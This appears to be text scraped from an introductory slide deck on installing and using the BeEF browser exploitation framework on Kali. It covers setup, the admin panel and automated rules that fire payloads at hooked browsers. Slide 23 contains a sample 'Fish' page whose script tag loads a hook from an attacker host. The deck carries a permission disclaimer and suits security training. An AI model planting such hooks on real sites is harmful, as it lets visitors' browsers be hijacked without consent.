intro to beef
play

Intro to BeEF Chad Hollman Analyst, County of Sacramento Department - PowerPoint PPT Presentation

Intro to BeEF Chad Hollman Analyst, County of Sacramento Department of Technology What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF What is BeEF? Installing BeEF Logging


  1. Intro to BeEF Chad Hollman Analyst, County of Sacramento Department of Technology

  2. What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

  3. What is BeEF? Installing BeEF Logging into BeEF for the first time Hooking your first browser Maintaining Persistence Automating BeEF

  4. What is BeEF? BeEF is short for the Browser Exploitation Framework.

  5. Disclaimer I am no expert in BeEF

  6. Disclaimer Before using, make sure you have permission

  7. What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

  8. Install BeEF pre-reqs ruby > 2.5 ruby gems sqlite3

  9. Install BeEF update kali apt update

  10. Install BeEF install beef apt install beef-xss -y

  11. Install BeEF install beef apt install libsqlite3-dev

  12. Install BeEF install beef gem install sqlite -v ‘1.4.2’ --source ‘htts://rubygems.org/’

  13. Install BeEF install beef usr/shared/beef-xss$ bundle

  14. Install BeEF update the default username and password vi /usr/share/beef-xss/config.yaml

  15. Install BeEF then launch beef ./beef

  16. Install BeEF then launch beef

  17. What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

  18. Logging into BeEF navigate to the ui/panel link in your browser

  19. Logging into BeEF

  20. Logging into BeEF

  21. What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

  22. Hooking your first browser

  23. Hooking your first browser <html> <head> <title>Fish</title> <script src=”http://192.168.1.51:3000/hook.js”></script> </head> <body> Banana </body> </html>

  24. Hooking your first browser

  25. Hooking your first browser

  26. What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

  27. Maintaining Persistence

  28. What is BeEF? Installing BeEF Logging into BeEF Hooking your first browser Maintaining Persistence Automating BeEF

  29. Automating BeEF using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available

  30. Automating BeEF using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available so instead of waiting at the beef user interface, for a hooked browser to come online, you can write an automated rule to execute a number of commands instead

  31. Automating BeEF using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available so instead of waiting at the beef user interface, for a hooked browser to come online, you can write an automated rule to execute a number of commands instead rules can be based on information taken from when the hook is first created, ie only run when a firefox browser is launched and only execute firefox vulnerable payloads

  32. Automating BeEF using the beef automated rule engine (are) you can run commands anytime a hooked browser becomes available so instead of waiting at the beef user interface, for a hooked browser to come online, you can write an automated rule to execute a number of commands instead rules can be based on information taken from when the hook is first created, ie only run when a firefox browser is launched and only execute firefox vulnerable payloads rules can also be chained, so once one command is executed, another can be executed thereafter

  33. Automating BeEF configuring the automated rule engine configure delay target a specific operating system [‘Linux’, ‘Windows’, ‘OSX’, ‘Android’, ‘iOS’, ‘Blackberry’, ‘ALL’] target specific browsers [‘FF’, ‘C’, ‘IE’, ‘O’, ‘ALL’] provide matching options [‘<’, ‘<=’, ‘==’, ‘>=’, ‘>’, ‘ALL’, ‘Vista’, ‘XP’] multiple configs

  34. Demo

  35. Thank you! hollmanchad@gmail.com @gh0st

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend


More recommend